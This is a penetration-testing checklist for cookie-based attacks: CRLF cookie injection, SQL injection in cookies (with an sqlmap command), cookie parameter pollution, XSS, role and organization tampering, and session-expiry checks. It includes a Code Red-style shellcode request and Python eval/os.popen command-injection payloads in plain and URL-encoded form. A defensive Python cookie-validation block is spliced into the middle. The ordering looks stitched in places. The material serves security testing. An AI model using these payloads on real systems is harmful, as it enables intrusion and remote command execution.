Cookie Based Attacks

Checklist

Check if any PII or other sensitive information is stored in cookies. This information usually includes: email, session ID, date of birth, mobile number, address, SSN, etc.
GET  /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a
Try injecting arbitrary cookies using attacks such as CRLF injection; sometimes this can be used to escalate privileges, or, if the application malfunctions, it can reveal sensitive information through stack traces.
Similar to parameter pollution, but here the attacker tries to inject multiple user IDs into the same user_id parameter.
Forcing the server to process cookies larger than the cookie size limit defined by the server may cause a denial of service.
<https://target.com/index.php?param1=xxxxxxxxxxxxxxxxxxxxxx>
After sending "xxxxxxxxxxxxxxxxxxxxxx" as the value of param1, check your cookies. If there is a cookie whose value is "xxxxxxxxxxxxxxxxxxxxxx", the website is vulnerable.
References: [Hackerone #105363](<https://hackerone.com/reports/105363>)
How to inject the code in cookies?
There are many HTTP interceptors and HTTP editors that can intercept the HTTP request before it is sent to the server. The tester can then introduce a malicious SQL statement in the cookie field. It is like a GET/POST based SQL injection, except that certain characters can't be used. For example, '**;**' and '**,**' are typically treated as delimiters, so they end the injection if they aren't URL-encoded.
Cookie: sessionId=xxxbad1fdc' order by 1# (Normal)
Cookie: sessionId=xxxbad1fdc' order by 2# (Error)
After the error: sqlmap -u "" --cookie="" -p "" --dbs
1. Assume that the cookie uses a parameter called **user_id=** to retrieve some data.
2. However, the application is not vulnerable to IDOR, and changing **user_id** to the victim's value doesn't help you.
3. The attacker adds an additional **user_id=** parameter to the cookie with the victim's user ID, like: **user_id=attacker&user_id=victim**
4. Three things can happen here:
- the application retrieves the victim's data
- the application retrieves both the victim's data and the attacker's data
- the application does not retrieve the data; it is not vulnerable
Try accessing a protected resource after removing the cookies.
Assume that the value of the cookie parameter "name" is reflected in the application; change the "name" value to an XSS payload.
1. Session doesn't expire on logout
2. Long session expiry
3. Session doesn't expire on password reset/change
4. Concurrent sessions
1. Assume that the application uses a multi-organization model
2. Cookies are used to determine which organization a user can access
3. Alter the cookie in order to access some other organization
  • vertical

1. Assume the cookie is used to determine the role of the user
2. Alter the cookie in order to elevate the role of the user
  • similarly

1. Try whether a lower-privileged user's cookie can be used to access higher-privileged functions
2. Try whether the cookie of an organization 1 user can be used to access the functions of organization 2
When an application uses the same session variable for multiple purposes, an attacker can abuse this to trick the application into performing an action as an authenticated or privileged user.
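As an added defensive example (not from the original checklist), the following Python shows the server-side handling for two items above: the duplicate user_id cookie-pollution case and the role-in-cookie tampering case. It parses the Cookie header, rejects a request that carries the same name twice, and accepts a role only when its HMAC signature verifies; SECRET_KEY, the cookie names and the role list are assumed for the demo.

```python
import hashlib
import hmac
from typing import Dict, Optional

# Assumed demo key (constructed); a real deployment loads it from a secrets store.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"
KNOWN_ROLES = ("user", "admin")


class DuplicateCookieError(ValueError):
    """Same cookie name sent twice, e.g. user_id=attacker; user_id=victim."""


def parse_cookie_header(header: str) -> Dict[str, str]:
    """Parse a raw Cookie header, refusing duplicate names.

    Lenient parsers keep either the first or the last value, so a proxy
    and the application can disagree on which user_id applies.
    """
    cookies: Dict[str, str] = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        name = name.strip()
        if not sep or not name:
            continue  # ignore empty or malformed pairs
        if name in cookies:
            raise DuplicateCookieError(name)
        cookies[name] = value.strip()
    return cookies


def sign_value(value: str) -> str:
    """Return '<value>.<hex HMAC>' so later edits to the value are detectable."""
    mac = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify_value(signed: str) -> Optional[str]:
    """Return the original value if the HMAC matches, else None."""
    value, sep, mac = signed.rpartition(".")
    if not sep:
        return None  # unsigned cookie, e.g. a hand-written role=admin
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None


def resolve_role(header: str) -> Optional[str]:
    """Effective role for a request: None if rejected, 'guest' if unproven."""
    try:
        cookies = parse_cookie_header(header)
    except DuplicateCookieError:
        return None  # ambiguous request: reject rather than guess
    role = verify_value(cookies.get("role", ""))
    return role if role in KNOWN_ROLES else "guest"
```

A reflected cookie, a tampered role or a duplicate name all fall into the "guest" or rejected path, so the checklist items above produce no privilege change against this handling.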
eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))
eval(compile("""for x in range(1):\n import os\n os.popen(r'COMMAND').read()""",'','single'))
eval(compile("""__import__('os').popen(r'COMMAND').read()""",'','single'))
__import__('os').popen('COMMAND').read()
param=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
param=eval%28compile%28%22%22%22for%20x%20in%20range%281%29%3A%5Cn%20import%20os%5Cn%20os.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
param=eval%28compile%28%22%22%22__import__%28%27os%27%29.popen%28r%27COMMAND%27%29.read%28%29%22%22%22%2C%27%27%2C%27single%27%29%29
param=__import__%28%27os%27%29.popen%28%27COMMAND%27%29.read%28%29

Example with one expression

__import__('os').popen('COMMAND').read()

Example with multiple expressions, separated by commas

str("-"*50),__import__('os').popen('COMMAND').read()
If cookies contain serialized objects, try performing insecure deserialization checks (see the PortSwigger labs).
